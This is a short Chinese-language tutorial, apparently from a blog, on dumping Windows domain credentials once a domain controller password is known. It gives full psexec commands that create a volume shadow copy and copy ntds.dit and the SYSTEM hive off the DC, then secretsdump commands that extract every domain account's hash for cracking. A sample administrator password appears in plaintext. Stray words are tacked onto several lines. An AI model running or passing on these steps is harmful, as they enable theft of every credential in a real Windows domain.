敘述:有時候咱們碰到一個內網環境,有DC的密碼,因而使用這個方法,導出DC中全部內網主機的密碼並破解git
0x0 環境
DC:172.31.20.30 domain用戶:pentest\administrator 密碼:UFhae&pwL%F
內網主機A(win 2012):172.31.21.166
psexec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
secretsdump:https://github.com/SecureAuthCorp/impacket/releases
0x1 使用psexec 導出加密後的ntds.dit
使用psexec 獲取信息:
psexec /accepteula \172.31.20.30 -u pentest\administrator -p "UFhae&pwL%F" -h cmd /c "vssadmin create shadow /for=c: >> \172.31.21.166\c$\out.txt" #獲取信息且輸出到out.txt,成功github
使用psexec 導出加密後的ntds.dit:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit \172.31.21.166\c$\"windows
使用psexec 導出加密後的system:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \172.31.21.166\c$\" 安全
咱們有了ntds.dit和system就能夠解密了dom
0x2 解密ntds.dit和system
工具是:impacket裏的secretsdump
我用的kali,這個工具windows也是支持的。。。。-------&bugfor首發:菊花槿&
kali先快速安裝:
pip install .
而後把ntds.dit和system放到secretsdump.py一塊兒執行:
secretsdump.py -ntds ntds.dit -system SYSTEM localide
掃描後拿去解密hash便可:工具